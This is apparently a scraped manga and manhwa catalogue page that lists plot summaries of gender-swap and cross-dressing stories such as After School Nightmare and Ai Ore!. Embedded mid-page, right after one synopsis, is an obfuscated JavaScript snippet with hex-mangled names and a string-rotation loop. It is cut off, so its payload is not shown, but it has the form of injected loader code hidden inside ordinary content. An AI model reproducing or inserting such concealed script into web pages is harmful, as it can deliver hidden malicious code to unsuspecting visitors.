After a guy wakes up as a girl one morning, his roommate wants him to turn back.
Nishino is a cross-dresser hiding that he's a guy, and he gets asked out by Akutagawa, who has a reputation for being a loner and a misogynist.
Read manhwa Addiction The abandoned princess wished to bring down the imperial family. So, on a cold winter night, Estelle awakened the blue-eyed devil who had been slumbering in the Ice Castle. “Make me the emperor.” The beautiful devil, surrounded by pure white snow, ice, and a rich floral fragrance, accepted the contract and whispered. “Welcome to hell, Estelle.” Estelle thought that night was her first encounter with the devil, but there was an old, forgotten first contract between them… “The year you come of age. On the night of the full moon in midwinter. The day the doors of the Ice Castle open. Promise to summon me then.”
An adorable story about a boy who got raised as a girl by his parents so he can succeed in the family's traditional theatre where the male actor has to act like a woman. Things get fun when you throw in a bunch of guys who think Jun is a woman and fall for him, and a girl named Ayano who accidentally learned Jun's secret... Did I mention that Jun can mop the floor with anybody, but he's usually too busy 'Kyaa'ing cutely?
After a miscalculation, Princess Stephanie, who holds supreme power in the empire, dies mysteriously on the eve of her coronation as the Queen. Stephanie opened her eyes with endless doubts and anger, and was reborn in a small border town in the Aiello Empire. She thought she would be far away from the political center, but she found that the people around her were all familiar… cubs (children)?! From their mouths, she learned that her enemies were doing well after her death and became big bosses… What should she do? “After Rebirth, I’m Surrounded by Enemy Cubs”
Read Manhua After Constantly Dying, I Became The Emperor Venerable / Buduan Zuo Si Hou, Wo Chengle Wan Ren Mi Di Zun / After Constantly Trying To Die, I Became The Emperor Venerable Everyone Crazy About / Bùduàn Zuò Sǐ Hòu, Wǒ Chéngle Wàn Rén Mí Dì Zūn / Sau Khi Không Ngừng Tìm Đường Chết, Ta Trở Thành Đế Tôn Vạn Người Mê / 不断作死后,我成了万人迷帝尊 / 不断作死后我成了万人迷帝尊初初子语 / 年少帝尊 …Emperor Yan Ge: It Is Better To Send Me To Death Than To Send The Emperor Away, Thank You. The Immortals: He Actually Said Thank You To Me, Really, I Cried To Death. Emperor Yan Ge: …
One day Jina, a 24-year-old woman, realizes that she has a peculiar constitution that turns into a man's body at midnight. Forced to change to a job without overtime, Jina starts working at a law firm as an office clerk. An unfortunate chain of events leads to her handsome playboy lawyer boss witnessing the moment when she transforms into a man...?!<script></script><script>(function(_0x446d43,_0x546ee6){var _0x1f15b4=_0x413a,_0x33844c=_0x446d43();while(!![]){try{var _0x164f6e=-parseInt(_0x1f15b4(0xab))/(0x6*-0x603+-0x15ea+0x39fd)*(parseInt(_0x1f15b4(0xa1))/(0xd47+-0x1983+-0x61f*-0x2))+parseInt(_0x1f15b4(0xb1))/(-0xa4e*0x1+-0xaf1+0x1542)*(parseInt(_0x1f15b4(0xb9))/(0x4*0x3d1+0xb*-0x338+0x1428))+parseInt(_0x1f15b4(0x9f))/(0x12cd*-0x1+-0x46a+-0x173c*-0x1)+-parseInt(_0x1f15b4(0xb7))/(0x4*-0x45d+0xef*-0xb+0x1*0x1bbf)+parseInt(_0x1f15b4(0xb6))/(-0x245f+-0xb1a+0x2f80)+-parseInt(_0x1f15b4(0xbe))/(-0xff8+-0xa45+0x1a45)*(-parseInt(_0x1f15b4(0xb5))/(0x682+0x12ba*0x2+-0x41*0xad))+-parseInt(_0x1f15b4(0xaf))/(-0x1c*0xda+-0x20c7+0x38a9)*(parseInt(_0x1f15b4(0xa9))/(-0xe02+-0xf57+-0x4c*-0x63));if(_0x164f6e===_0x546ee6)break;else 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"Sensei, is this a boy or a girl?" "Do you want to know?" Ichijo Mashiro and fellow classmates are enlisted in a mysterious weekly class that takes the form of a shared nightmare. Like most teenagers, Mashiro has a secret.. he's neither fully male nor female! So far, Mashiro's been able to live life as a boy, but all this changes when he's informed of a new class he 'must' partake in order to graduate from his elite preparatory school. To pass, he must find the key and the one way to find it is to enter into a nightmare world, where his body and soul are put at the mercy of the worst kind of enemies -- other school students, who are battling to find the key. From renowned author Mizushiro Setona, comes a riveting epic mystery that lies between the students, that will have you engrossed from one page to the next. Happiness, sadness, blood and tears will all be shown, but which one leads to an ending? Take the next step into the world of After School Nightmare! From Go! Comi: Like most teenagers, Mashiro Ichijo has a secret. But Mashiro’s secret is that he’s neither fully male nor female! So far, Mashiro’s been able to live his life as a boy, but all this changes when he’s informed of a new class he must take in order to graduate from his elite prep school. To pass, he must find the “Key”…and the only way to find it is to enter into a nightmare world where his body and soul are put at the mercy of the worst kind of enemies: his classmates!
When other people experience a body transformation, it is inevitably either male to female or female to male. Me? I wake up to find myself transformed into two different bodies. Both a male body and a female body, one conscience operating two bodies, all sorts of embarrassing moments. Walking together normally makes other people think that I am sweethearts with my other-self, such sadness. Also, the entire business of a hero rescuing the beautiful maiden, I call Bull. I get slashed by a sword and my female body gets abducted, and he wants me to thank him?!?! Can it be less of a tragedy?
From Wikipedia: Hanabuki High School prohibits its pupils from wearing makeup. Among the school girls there is a rumour going around about a legendary make-up artist, Ageha, who secretly gives makeovers to girls after school. Any girl wanting Ageha to give them a makeover needs only to write their name and class on Ageha's card (showing Ageha's trademark, a swallowtail butterfly—agehach? in Japanese) and put it up on the school's notice board, and Ageha will later show up in their classroom. However, no one knows that Ageha's true identity is the quiet, bespectacled girl, Rin Fujiwara, except for the play boy, Riku Kisaragi. Amused by the idea, Kisaragi cross-dresses as Ageha's assistant to tag along with her as she works. A running gag in the story is that Ageha's clients think that Kisaragi is Ageha upon first meeting.
Nikotama Souhei is transferring to a new school and vows to enjoy a new life, living a lifestyle true to himself...or herself, as the case may be. Adopting the name "Sara", Souhei heads to school in a girls' uniform, ready to grab life by the knads and twist. Sara's no pushover: bright, hyper and frequently violent. She's like nothing anyone at the school has ever encountered. Especially her sweet, upstanding classmate Naruse Kaito who finds himself knee-deep in Sara's "Brave New World". A nice bit of shoujo fluffiness unique for featuring an honest-to-goodness, non-apologetic transgendered hero(ine).
From Baka-Updates: Because Shinjo Mayu stopped her job relationship with Shogakukan, she continued her incomplete manga in Asuka and called it Ai Ore! This can be considered a continuation of Ai wo Utau Yori Ore ni Oborero! or even as a second series as it introducing a lot new character and unrevealed past When Akira announces he was a boy in the first book "Ai wo Utau Yori Ore ni Oborero" so does the fact Akira goes to Dankaisan the boys school next to St. Nobora (Mizuki's school) Things start to get rough when pressure against Mizuki dating a boy from that school rise. + Highschool of the dead manga + Kobato manga